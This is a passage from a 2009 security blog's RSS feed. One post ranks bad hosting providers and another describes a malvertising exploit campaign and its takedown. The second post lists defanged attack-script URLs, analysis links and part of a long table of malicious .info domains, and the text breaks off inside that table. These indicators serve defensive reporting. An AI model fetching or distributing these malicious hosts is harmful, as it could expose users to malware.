<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Andrew Martin &#187; Intelligence</title>
	<atom:link href="http://www.martinsecurity.net/category/intelligence/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.martinsecurity.net</link>
	<description>Viewing InfoSec from the trenches (formerly Real Security)</description>
	<lastBuildDate>Fri, 18 Dec 2009 19:29:17 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>The Top 50 Bad Hosts &#8211; Another Report by HostExploit</title>
		<link>http://www.martinsecurity.net/2009/12/18/the-top-50-bad-hosts-another-report-by-hostexploit/</link>
		<comments>http://www.martinsecurity.net/2009/12/18/the-top-50-bad-hosts-another-report-by-hostexploit/#comments</comments>
		<pubDate>Fri, 18 Dec 2009 19:29:17 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[hostexploit]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=431</guid>
		<description><![CDATA[Jart and Scott from HostExploit (http://hostexploit.com/) have put together another paper on bad hosting providers, this time giving an overview of 50 that host a great deal of malicious code. The ranking is based on a mathematical calculation, which is included in the report. To be absolutely clear, these providers are not knowingly acting as [...]]]></description>
			<content:encoded><![CDATA[<p>Jart and Scott from HostExploit (<a href="http://hostexploit.com/" target="_blank">http://hostexploit.com/</a>) have put together another paper on bad hosting providers, this time giving an overview of 50 that host a great deal of malicious code. The ranking is based on a mathematical calculation, which is included in the report. To be absolutely clear, these providers are not knowingly acting as hubs of cybercrime like McColo, Real Host, etc were. These are hosts that would benefit greatly by improving their security posture. The report also highlights the top 10 good hosts, so readers can get a feel for the differences between the two.</p>
<p><a title="top 50 bad hosts" href="http://hostexploit.com/index.php?option=com_content&amp;view=article&amp;id=201&amp;Itemid=106" target="_blank">View the top 50</a></p>
<p><a href="http://hostexploit.com/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=126" target="_blank">Download the report</a></p>
<p>Here&#8217;s a brief look at the top 10 bad hosts:</p>
<table border="1" cellspacing="0" cellpadding="2" bordercolor="#cccccc">
<tbody>
<tr>
<th>HE Rank</th>
<th>HE Index</th>
<th>AS Number</th>
<th>Name</th>
<th>Country</th>
</tr>
<tr>
<td><span>1</span></td>
<td><strong>269.9</strong></td>
<td><a href="http://sitevet.com/?q=AS30407&amp;qt=asn" target="_blank">AS30407</a></td>
<td>VELCOM &#8211; Rcp.net</td>
<td>CANADA</td>
</tr>
<tr>
<td><span>2</span></td>
<td><strong>225.7</strong></td>
<td><a href="http://sitevet.com/?q=AS23522&amp;qt=asn" target="_blank">AS23522</a></td>
<td>IPNAP-ES &#8211; GigeNET</td>
<td>UNITED STATES</td>
</tr>
<tr>
<td><span>3</span></td>
<td><strong>179.7</strong></td>
<td><a href="http://sitevet.com/?q=AS16276&amp;qt=asn" target="_blank">AS16276</a></td>
<td>OVH OVH</td>
<td>FRANCE</td>
</tr>
<tr>
<td><span>4</span></td>
<td><strong>159.5</strong></td>
<td><a href="http://sitevet.com/?q=AS41665&amp;qt=asn" target="_blank">AS41665</a></td>
<td>HOSTING-AS National Hosting Provider, Hosting.UA</td>
<td>UKRAINE</td>
</tr>
<tr>
<td><span>5</span></td>
<td><strong>158.7</strong></td>
<td><a href="http://sitevet.com/?q=AS4134&amp;qt=asn" target="_blank">AS4134</a></td>
<td>CHINANET &#8211; BACKBONE No.31,Jin-rong Street</td>
<td>CHINA</td>
</tr>
<tr>
<td><span>6</span></td>
<td><strong>151.7</strong></td>
<td><a href="http://sitevet.com/?q=AS49637&amp;qt=asn" target="_blank">AS49637</a></td>
<td>ZHM-AS PE Zavalnuk Vladislav Mihailovich</td>
<td>KAZAKHSTAN</td>
</tr>
<tr>
<td><span>7</span></td>
<td><strong>147.9</strong></td>
<td><a href="http://sitevet.com/?q=AS32613&amp;qt=asn" target="_blank">AS32613</a></td>
<td>IWEB-AS &#8211; iWeb Technologies Inc.</td>
<td>CANADA</td>
</tr>
<tr>
<td><span>8</span></td>
<td><strong>142.2</strong></td>
<td><a href="http://sitevet.com/?q=AS10929&amp;qt=asn" target="_blank">AS10929</a></td>
<td>Netelligent Hosting Services Inc</td>
<td>CANADA</td>
</tr>
<tr>
<td><span>9</span></td>
<td><strong>140.3</strong></td>
<td><a href="http://sitevet.com/?q=AS28753&amp;qt=asn" target="_blank">AS28753</a></td>
<td>NETDIRECT AS NETDIRECT Frankfurt, DE</td>
<td>GERMANY</td>
</tr>
<tr>
<td><span>10</span></td>
<td><strong>135.4</strong></td>
<td><a href="http://sitevet.com/?q=AS49314&amp;qt=asn" target="_blank">AS49314</a></td>
<td>NEVAL PE Nevedomskiy Alexey Alexeevich</td>
<td>RUSSIAN FEDERATION</td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/12/18/the-top-50-bad-hosts-another-report-by-hostexploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Major Stealthy Malware Campaign &#8211; 711 Domains Taken Down</title>
		<link>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/</link>
		<comments>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/#comments</comments>
		<pubDate>Tue, 08 Dec 2009 21:52:18 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=427</guid>
		<description><![CDATA[Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which [...]]]></description>
			<content:encoded><![CDATA[<p>Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which also made investigating the source a pain. Performing some searches on the domains strangely did not yield any information from common sources such as malwareurl, malwaredomainlist, McAfee Site Adviser, etc.</p>
<p>To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!</p>
<p>Attack scripts:</p>
<p>hxxp://us.hn0.info/f/1/ie.html</p>
<p><a title="blocked::http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372" href="http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372">http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372</a></p>
<p>hxxp://us.hn0.info/f/1/ff.html</p>
<p><a title="blocked::http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360" href="http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360">http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360</a></p>
<p>hxxp://us.hn0.info/f/1/cosplay.swf<br />
<a title="blocked::http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf" href="http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf">http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf</a></p>
<p>Shellcode:<br />
<a title="blocked::http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262" href="http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262">http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262</a></p>
<p>The domains:</p>
<table style="border-collapse: collapse; width: 271pt;" border="0" cellspacing="0" cellpadding="0" width="361">
<col style="width: 55pt;" width="73"></col>
<col style="width: 108pt;" width="144"></col>
<col style="width: 60pt;" width="80"></col>
<col style="width: 48pt;" width="64"></col>
<tbody>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt; width: 55pt;" width="73" height="20">FK0.INFO<span> </span></td>
<td style="width: 108pt;" width="144">AC0.INFO<span> </span></td>
<td style="width: 60pt;" width="80">KD8.INFO<span> </span></td>
<td style="width: 48pt;" width="64">JZ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK6.INFO<span> </span></td>
<td>AE0.INFO<span> </span></td>
<td>KD9.INFO<span> </span></td>
<td>JZ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK7.INFO<span> </span></td>
<td>AE6.INFO<span> </span></td>
<td>CUUB.INFO<span> </span></td>
<td>JZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK8.INFO<span> </span></td>
<td>AE9.INFO<span> </span></td>
<td>CXXB.INFO<span> </span></td>
<td>JZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK9.INFO<span> </span></td>
<td>AF0.INFO<span> </span></td>
<td>DRRB.INFO<span> </span></td>
<td>KA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL0.INFO<span> </span></td>
<td>AF5.INFO<span> </span></td>
<td>DTTB.INFO<span> </span></td>
<td>KB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL7.INFO<span> </span></td>
<td>AF8.INFO<span> </span></td>
<td>DYYB.INFO<span> </span></td>
<td>KB8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL8.INFO<span> </span></td>
<td>AF9.INFO<span> </span></td>
<td>GJGJ.INFO<span> </span></td>
<td>KC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FM0.INFO<span> </span></td>
<td>AG0.INFO<span> </span></td>
<td>RFVT.INFO<span> </span></td>
<td>KC6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FM9.INFO<span> </span></td>
<td>AG7.INFO<span> </span></td>
<td>TGBY.INFO<span> </span></td>
<td>KC8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN3.INFO<span> </span></td>
<td>AG8.INFO<span> </span></td>
<td>UJMI.INFO<span> </span></td>
<td>KD3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN4.INFO<span> </span></td>
<td>AG9.INFO<span> </span></td>
<td>YHNU.INFO<span> </span></td>
<td>KD4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN5.INFO<span> </span></td>
<td>AH0.INFO<span> </span></td>
<td>DT0.INFO<span> </span></td>
<td>KD7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN6.INFO<span> </span></td>
<td>AH5.INFO<span> </span></td>
<td>DV0.INFO<span> </span></td>
<td>HX0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN7.INFO<span> </span></td>
<td>AH7.INFO<span> </span></td>
<td>DV6.INFO<span> </span></td>
<td>HY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN8.INFO<span> </span></td>
<td>AI0.INFO<span> </span></td>
<td>DV7.INFO<span> </span></td>
<td>HY3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO0.INFO<span> </span></td>
<td>AJ3.INFO<span> </span></td>
<td>DW0.INFO<span> </span></td>
<td>HY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO5.INFO<span> </span></td>
<td>AJ4.INFO<span> </span></td>
<td>DW9.INFO<span> </span></td>
<td>HY7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO6.INFO<span> </span></td>
<td>AJ5.INFO<span> </span></td>
<td>DX6.INFO<span> </span></td>
<td>HZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO7.INFO<span> </span></td>
<td>AJ7.INFO<span> </span></td>
<td>DX7.INFO<span> </span></td>
<td>HZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP4.INFO<span> </span></td>
<td>AJ9.INFO<span> </span></td>
<td>DX8.INFO<span> </span></td>
<td>HZ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP5.INFO<span> </span></td>
<td>AK0.INFO<span> </span></td>
<td>DY2.INFO<span> </span></td>
<td>HZ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP9.INFO<span> </span></td>
<td>AN0.INFO<span> </span></td>
<td>DY5.INFO<span> </span></td>
<td>HZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ0.INFO<span> </span></td>
<td>AO0.INFO<span> </span></td>
<td>DZ4.INFO<span> </span></td>
<td>HZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ3.INFO<span> </span></td>
<td>AO3.INFO<span> </span></td>
<td>DZ5.INFO<span> </span></td>
<td>IA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ4.INFO<span> </span></td>
<td>AO8.INFO<span> </span></td>
<td>EA0.INFO<span> </span></td>
<td>IB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ6.INFO<span> </span></td>
<td>AP3.INFO<span> </span></td>
<td>EA2.INFO<span> </span></td>
<td>IB4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ7.INFO<span> </span></td>
<td>AP9.INFO<span> </span></td>
<td>EA4.INFO<span> </span></td>
<td>IB5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FR0.INFO<span> </span></td>
<td>AQ0.INFO<span> </span></td>
<td>EA5.INFO<span> </span></td>
<td>IB6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS0.INFO<span> </span></td>
<td>AQ3.INFO<span> </span></td>
<td>EA6.INFO<span> </span></td>
<td>IB7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS4.INFO<span> </span></td>
<td>AQ9.INFO<span> </span></td>
<td>EA7.INFO<span> </span></td>
<td>IB8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS6.INFO<span> </span></td>
<td>AR0.INFO<span> </span></td>
<td>EA8.INFO<span> </span></td>
<td>IB9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS7.INFO<span> </span></td>
<td>AT4.INFO<span> </span></td>
<td>EB0.INFO<span> </span></td>
<td>IC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT0.INFO<span> </span></td>
<td>AU0.INFO<span> </span></td>
<td>EB4.INFO<span> </span></td>
<td>IF4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT5.INFO<span> </span></td>
<td>AW0.INFO<span> </span></td>
<td>ED0.INFO<span> </span></td>
<td>IF5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT9.INFO<span> </span></td>
<td>AX0.INFO<span> </span></td>
<td>ED3.INFO<span> </span></td>
<td>IF6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU0.INFO<span> </span></td>
<td>AX3.INFO<span> </span></td>
<td>EF2.INFO<span> </span></td>
<td>IF7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU4.INFO<span> </span></td>
<td>AY0.INFO<span> </span></td>
<td>EH4.INFO<span> </span></td>
<td>IF8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU8.INFO<span> </span></td>
<td>AZ5.INFO<span> </span></td>
<td>EH7.INFO<span> </span></td>
<td>IF9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV4.INFO<span> </span></td>
<td>AZ6.INFO<span> </span></td>
<td>EI4.INFO<span> </span></td>
<td>IG5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV6.INFO<span> </span></td>
<td>AZ7.INFO<span> </span></td>
<td>EI5.INFO<span> </span></td>
<td>IG6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV7.INFO<span> </span></td>
<td>AZ8.INFO<span> </span></td>
<td>EI6.INFO<span> </span></td>
<td>IG9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV8.INFO<span> </span></td>
<td>AZ9.INFO<span> </span></td>
<td>EI8.INFO<span> </span></td>
<td>IH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV9.INFO<span> </span></td>
<td>BC0.INFO<span> </span></td>
<td>EI9.INFO<span> </span></td>
<td>IH2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW0.INFO<span> </span></td>
<td>BC6.INFO<span> </span></td>
<td>EK0.INFO<span> </span></td>
<td>IH3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW5.INFO<span> </span></td>
<td>BC8.INFO<span> </span></td>
<td>EK2.INFO<span> </span></td>
<td>IH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW6.INFO<span> </span></td>
<td>BC9.INFO<span> </span></td>
<td>EK4.INFO<span> </span></td>
<td>IH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW8.INFO<span> </span></td>
<td>BD3.INFO<span> </span></td>
<td>EK5.INFO<span> </span></td>
<td>IH6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW9.INFO<span> </span></td>
<td>BF0.INFO<span> </span></td>
<td>EK7.INFO<span> </span></td>
<td>IJ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY0.INFO<span> </span></td>
<td>BF4.INFO<span> </span></td>
<td>EL0.INFO<span> </span></td>
<td>IJ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY2.INFO<span> </span></td>
<td>BF6.INFO<span> </span></td>
<td>EL6.INFO<span> </span></td>
<td>IJ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY5.INFO<span> </span></td>
<td>BF8.INFO<span> </span></td>
<td>EM5.INFO<span> </span></td>
<td>IJ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY6.INFO<span> </span></td>
<td>BF9.INFO<span> </span></td>
<td>EM8.INFO<span> </span></td>
<td>IJ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ0.INFO<span> </span></td>
<td>BG0.INFO<span> </span></td>
<td>EM9.INFO<span> </span></td>
<td>IK3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ3.INFO<span> </span></td>
<td>BH0.INFO<span> </span></td>
<td>EN8.INFO<span> </span></td>
<td>IK4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ4.INFO<span> </span></td>
<td>BH2.INFO<span> </span></td>
<td>EO0.INFO<span> </span></td>
<td>IK5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ5.INFO<span> </span></td>
<td>BI6.INFO<span> </span></td>
<td>EO3.INFO<span> </span></td>
<td>IK6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ7.INFO<span> </span></td>
<td>BI7.INFO<span> </span></td>
<td>EO5.INFO<span> </span></td>
<td>IK7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ8.INFO<span> </span></td>
<td>BJ4.INFO<span> </span></td>
<td>EO6.INFO<span> </span></td>
<td>IK8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GB0.INFO<span> </span></td>
<td>BK2.INFO<span> </span></td>
<td>EO7.INFO<span> </span></td>
<td>IK9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC0.INFO<span> </span></td>
<td>BL0.INFO<span> </span></td>
<td>EO8.INFO<span> </span></td>
<td>IL0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC6.INFO<span> </span></td>
<td>BL8.INFO<span> </span></td>
<td>EO9.INFO<span> </span></td>
<td>IL7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC7.INFO<span> </span></td>
<td>BL9.INFO<span> </span></td>
<td>EP6.INFO<span> </span></td>
<td>IL8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC8.INFO<span> </span></td>
<td>BM3.INFO<span> </span></td>
<td>EP7.INFO<span> </span></td>
<td>IO2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC9.INFO<span> </span></td>
<td>BM5.INFO<span> </span></td>
<td>EP8.INFO<span> </span></td>
<td>IO3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD0.INFO<span> </span></td>
<td>BM8.INFO<span> </span></td>
<td>EQ4.INFO<span> </span></td>
<td>IO5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD4.INFO<span> </span></td>
<td>BN0.INFO<span> </span></td>
<td>EQ7.INFO<span> </span></td>
<td>IO6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD5.INFO<span> </span></td>
<td>BN3.INFO<span> </span></td>
<td>ER9.INFO<span> </span></td>
<td>IQ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD6.INFO<span> </span></td>
<td>BN5.INFO<span> </span></td>
<td>ES7.INFO<span> </span></td>
<td>IR0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD7.INFO<span> </span></td>
<td>BN7.INFO<span> </span></td>
<td>ES8.INFO<span> </span></td>
<td>IR6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD8.INFO<span> </span></td>
<td>BN8.INFO<span> </span></td>
<td>ES9.INFO<span> </span></td>
<td>IR7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GF3.INFO<span> </span></td>
<td>BP0.INFO<span> </span></td>
<td>EU0.INFO<span> </span></td>
<td>IR9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH4.INFO<span> </span></td>
<td>BP5.INFO<span> </span></td>
<td>EV9.INFO<span> </span></td>
<td>IU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH5.INFO<span> </span></td>
<td>BP6.INFO<span> </span></td>
<td>EW0.INFO<span> </span></td>
<td>IU2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH6.INFO<span> </span></td>
<td>BP7.INFO<span> </span></td>
<td>EW4.INFO<span> </span></td>
<td>IV2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH7.INFO<span> </span></td>
<td>BP8.INFO<span> </span></td>
<td>EY0.INFO<span> </span></td>
<td>IV4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI0.INFO<span> </span></td>
<td>BQ0.INFO<span> </span></td>
<td>EZ0.INFO<span> </span></td>
<td>IV5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI3.INFO<span> </span></td>
<td>BQ2.INFO<span> </span></td>
<td>EZ9.INFO<span> </span></td>
<td>IV6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI6.INFO<span> </span></td>
<td>BQ3.INFO<span> </span></td>
<td>FA0.INFO<span> </span></td>
<td>IW0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI8.INFO<span> </span></td>
<td>BQ4.INFO<span> </span></td>
<td>FC0.INFO<span> </span></td>
<td>IW2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ0.INFO<span> </span></td>
<td>BQ5.INFO<span> </span></td>
<td>FC5.INFO<span> </span></td>
<td>IW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ7.INFO<span> </span></td>
<td>BQ6.INFO<span> </span></td>
<td>FC7.INFO<span> </span></td>
<td>IW5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ8.INFO<span> </span></td>
<td>BQ7.INFO<span> </span></td>
<td>FC9.INFO<span> </span></td>
<td>IW6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ9.INFO<span> </span></td>
<td>BQ8.INFO<span> </span></td>
<td>FD0.INFO<span> </span></td>
<td>IX4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK0.INFO<span> </span></td>
<td>BQ9.INFO<span> </span></td>
<td>FD5.INFO<span> </span></td>
<td>IX5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK3.INFO<span> </span></td>
<td>BR5.INFO<span> </span></td>
<td>FD8.INFO<span> </span></td>
<td>IX6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK5.INFO<span> </span></td>
<td>BR6.INFO<span> </span></td>
<td>FD9.INFO<span> </span></td>
<td>IX7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK6.INFO<span> </span></td>
<td>BR7.INFO<span> </span></td>
<td>FE0.INFO<span> </span></td>
<td>IY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK8.INFO<span> </span></td>
<td>BR9.INFO<span> </span></td>
<td>FE4.INFO<span> </span></td>
<td>IY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL3.INFO<span> </span></td>
<td>BS3.INFO<span> </span></td>
<td>FE7.INFO<span> </span></td>
<td>IY3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL4.INFO<span> </span></td>
<td>BS5.INFO<span> </span></td>
<td>FG0.INFO<span> </span></td>
<td>IY4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
